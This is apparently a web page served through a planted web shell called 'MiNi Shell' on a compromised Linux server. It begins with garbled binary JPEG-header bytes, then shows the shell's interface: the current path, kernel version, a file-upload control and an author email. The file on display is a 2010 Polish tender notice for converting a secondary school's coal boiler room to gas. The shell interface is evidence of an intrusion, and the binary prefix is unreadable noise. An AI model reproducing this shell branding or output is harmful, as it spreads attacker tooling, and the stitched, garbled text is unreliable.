JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100630/170961-N-2010.html

<p class="kh_header"><b>Końskie: ROBOTY BUDOWLANE 
związane z przebudową kotłowni węglowej na gazową wraz z niezbędnymi robotami towarzyszącymi w budynku szkolnym 
II Liceum Ogólnokształcącego w Końskich</b><br>
<b>Numer ogłoszenia: 170961 - 2010; data zamieszczenia: 30.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROBOTY BUDOWLANE 
związane z przebudową kotłowni węglowej na gazową wraz z niezbędnymi robotami towarzyszącymi w budynku szkolnym 
II Liceum Ogólnokształcącego w Końskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia związany jest z przebudową kotłowni węglowej na gazową 
w 3-kondygnacyjnym budynku szkolnym II Liceum Ogólnokształcącego im. Marii Skłodowskiej-Curie  w Końskich przy ul. Sportowej 9 na działce nr geod. 5274. Obejmuje:
3.1. Przebudowę pomieszczeń kotłowni węglowej na potrzeby kotłowni wodnej niskoparametrowej opalanej gazem ziemnym GZ50 n.c.
Kotłownia węglowa usytuowana jest w podpiwniczeniu budynku.
Zakłada się demontaż:
- instalacji sanitarnych i technologicznych oraz urządzeń istniejącej kotłowni  
    węglowej - w całości
- schodów wewnętrznych z poziomu  -0,32 na poziom - 1,30 - w całości
- schodów wewnętrznych z poziomu  -0,32 na poziom  ? 0,00 - w całości
- drzwi wejściowych stalowych
- okien drewnianych
Za poziom ? 0,00 (poziom odniesienia) przyjmuje się poziom składu opału i pomieszczeń technicznych związanych z istniejącą kotłownią węglową.
Istniejąca hala kotłów węglowych znajduje się na poziomie -1,30, zaś przebudowana  (kotłownia gazowa) znajdować się będzie na poziomie -0,32
Z istniejącej hali kotłów zakłada się wydzielenie komunikacji (przedsionka) rozgraniczającego wejście do projektowanej hali kotłów gazowych oraz do pozostałych pomieszczeń po byłej kotłowni węglowej. Hala kotłów zostanie oddzielona ścianą działową od składu opału dotychczasowej  kotłowni węglowej. Z tego tytułu zakłada się wykonanie dwóch wejść  (Ds. 100x205 - szt. 2), wymianę drzwi wejściowych na Ds. 100x205 oraz doświetlenie przedsionka poprzez wykonanie okna Op  45x132, wymianę w hali kotłów dwóch okien drewnianych na okna Op 120 x145 - szt. 2 i inne niezbędne roboty wykończeniowe.
Projektowane gabaryty:
A.  Przedsionek
- powierzchnia użytkowa - 6,00 m2
- kubatura - 17,00 m3
- wysokość - 2,83 m
B.  Hala kotłów kotłowni gazowej 
- powierzchnia użytkowa - 42,50 m2
- kubatura - 120,00 m3
- wysokość - 2,83 m
Wymagania konstrukcyjno-materiałowe w sposób szczegółowy opisuje dokumentacja projektowa stanowiąca załącznik nr 1 do SIWZ.
3.2. Montaż urządzeń technologicznych i instalacyjnych stanowiących  wyposażenie kotłowni gazowej, w tym:
- zabudowę dwóch jednostek kotłowych  Qn1 = 144 kW,p=0,6 MPa - praca w układzie zamkniętym
- palnika gazowego atmosferycznego 2-stopniowego stanowiącego integralną część jednostki kotłowej
- urządzeń i regulatorów pozostałych: sterowanie obiegów kotłowych (kaskada) + dwóch obiegów grzewczych c.o. + obiegu grzewczego i cyrkulacji c.w.u.; sterowanie obiegu grzewczego c.o.
- zasobnikowego podgrzewacza ciepłej wody użytkowej o pojemności 300 dm3
Przewiduje się trzy niezależnie sterowane obiegi funkcjonalne kotłowni:
 obieg grzewczy nr 1 - centralne ogrzewanie Q1[co] = 255,36 kW; dp1 = 50 kPa
 obieg grzewczy nr 2 - centralne ogrzewanie Q2[co] =   33,20 kW; dp2 = 40 kPa
 obieg grzewczy nr 3 - centralne ogrzewanie Q3[co] =   12,30 kW; dp3 = 20 kPa
oraz obieg grzewczy ciepłej wody użytkowej
obieg grzewczy nr 4 - centralne ogrzewanie Q4[cwu] =   max. 72 kW; dp4 = 30 kPa

Napełnianie zładu - wodą uzdatnioną poprzez stację uzdatniania wody Vn=2,0 m3/h, uzupełnianie zładu - automatyczne, sterowanie ciśnieniowe, stabilizacja ciśnienia - poprzez naczynia przeponowe: NG18/6 dla każdego kotła; N400/6 (instalacja c.o.); DE33/10 (instalacja c.w.u.)
Bardziej szczegółowo technologię kotłowni gazowej, materiały i urządzenia opisuje dokumentacja projektowa stanowiąca załącznik nr 1 do SIWZ. 
3.3. Oprowadzenie spalin kotłowych za pomocą projektowanego zbiorczego komina jednopłaszczowego ze stali nierdzewnej d350 - wkład w istniejący komin murowany 500 x 400 mm. Orientacyjna wysokość komina od poziomu projektowanego posadzki w kotłowni do wylotu wyniesie ok. 16,5 m. Przestrzeń między wkładem kominowym a wewnętrzną powierzchnią komina murowanego należy wypełnić wełną mineralną luzem odporną na temperaturę min. 250o.
3.4. Wykonanie wewnętrznych instalacji wody zimnej, kanalizacyjnej i wentylacji nawiewno-wywiewnej grawitacyjnej.
3.5. Wykonanie instalacji elektrycznych siły, oświetlenia i sterowania  oraz AKPiA dla zasilania urządzeń kotłowni gazowej, po uprzednim demontażu istniejącej instalacji elektrycznej.
3.6. Wykonanie instalacji gazu GZ50 n.c. poprzez  budowę;
- zewnętrznej instalacji  - odcinek o długości  ok.12,20 m:  od Punktu Redukcyjno-Pomiarowego zlokalizowanego w linii ogrodzenia terenu  do kurka głównego na ścianie budynku; rurociąg  z rur PE szeregu SDR-11 o średnicy 75x6,8 a w odległości 1,2 m od budynku i od Punktu Red.-Pom.  rury stalowe czarne bez szwu
- wewnętrznej instalacji  - odcinek o długości ok. 5,0 m, w tym ok. 3,60 m na zewnętrznej ścianie budynku : od kurka głównego do Aktywnego Systemu Bezpieczeństwa - rury stalowe czarne przewodowe bez szwu Dn65
- Aktywnego Systemu Bezpieczeństwa z lokalizacją na ścianie budynku (przy zejściu do kotłowni)
- wewnętrznej instalacji - odcinek od Aktywnego Systemu Bezpieczeństwa do kotłów.
3.7.Całkowity demontaż istniejącej instalacji centralnego ogrzewania (ok. 1400 grzejników żeliwnych) i wykonanie nowej  instalacji c.o. wodnej niskotemperaturowej o parametrach obliczeniowych tz/tp 80/60oC z wykorzystaniem tras dotychczasowych; praca instalacji w systemie zamkniętym, pompowym

Szczegółowo przedmiot zamówienia opisuje dokumentacja projektowa, stanowiąca załącznik nr 1do SIWZ i jest jej integralną częścią. Zawiera :
        1. Projekty  budowlane:
-  przebudowy kotłowni węglowej na gazową
- wymiany instalacji centralnego ogrzewania
- budowy zewnętrznej i wewnętrznej instalacji gazu GZ50 n.c.
        2.   Przedmiary robót
        3.   Specyfikacje techniczne wykonania i odbioru robót
Wskazanie w dokumentacji projektowej producenta urządzeń i  materiałów budowlanych należy traktować jako przykładowe. Wykonawca może zastosować   urządzenia  i  materiały budowlane równoważne do zaproponowanych przez projektanta z zastrzeżeniem, że muszą one spełniać   wymagania i parametry techniczno- technologiczne  określone w dokumentacji projektowej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.10.00-8, 45.26.28.00-9, 45.30.00.00-0, 45.32.00.00-6, 45.33.00.00-9, 45.33.11.00-7, 45.33.11.10-0, 45.31.57.00-5, 45.31.70.00-2, 45.31.51.00-9, 45.31.12.00-2, 45.33.30.00-0, 45.33.31.00-1, 45.23.12.20-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wpłaty wadium w wysokości 10 000,00 zł (słownie złotych: dziesięć tysięcy złotych). Forma wadium musi być zgodna z określoną w art. 45 ust. 6 PZP. W przypadku wyboru wadium w formie pieniężnej należy dokonać przelewu na rachunek bankowy realizatora zamówienia - II Liceum Ogólnokształcącego im. Marii Skłodowskie-Curie 26-200 Końskie, ul. Sportowa 9 -  o numerze 63 1240 5006 1111 0010 3310 4268
Wykonawca ma obowiązek dołączyć do oferty potwierdzenie wpłaty wadium. Zamawiający uzna wpłatę wadium w formie pieniężnej tylko wtedy, gdy znajdą się one faktycznie na jego rachunku bankowym przed upływem terminu składania ofert. 
Pozostałe formy wadium winny zostać złożone w sekretariacie szkolnym  II Liceum Ogólnokształcącego im. Marii Skłodowskie-Curie 26-200 Końskie, ul. Sportowa 9  przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia, co najmniej jedna z nich posiadać będzie min. 5-letni staż pracy w kierowaniu robotami instalacyjnymi w zakresie instalacji i urządzeń cieplnych, wentylacyjnych i gazowych oraz  co najmniej jedna z nich posiadać będzie min. 5-letni staż pracy w kierowaniu robotami konstrukcyjno-budowlanymi;
- w wykazie robót budowlanych znajdzie się co najmniej 1 robota budowlana odpowiadająca rodzajem przedmiotowi zamówienia (budowa kotłowni gazowej lub przebudowa kotłowni na gazową) o wartości nie mniejszej niż 350 000,00 zł. brutto;
- wielkość średniorocznego zatrudnienia w okresie ostatnich trzech lat przed upływem składania ofert, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie, wynosi na poziomie 15 osób;
- posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż oferowana cena wykonania przedmiotu zamówienia;
- jest ubezpieczony z tytułu odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 PZP (wg wzoru stanowiącego załącznik nr 1 do formularza ofertowego);
2) W myśl art. 26 ust. 2b ustawy PZP Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca zobowiązany jest załączyć do oferty:
-  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.konecki.wrota-swietokrzyskie.pl/web/guest/2lo_zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> II Liceum Ogólnokształcące im. Marii Skłodowskiej-Curie
26-200 Końskie, ul. Sportowa 9
sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2010 godzina 10:00, miejsce: II Liceum Ogólnokształcące im. Marii Skłodowskiej-Curie
26-200 Końskie, ul. Sportowa 9
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com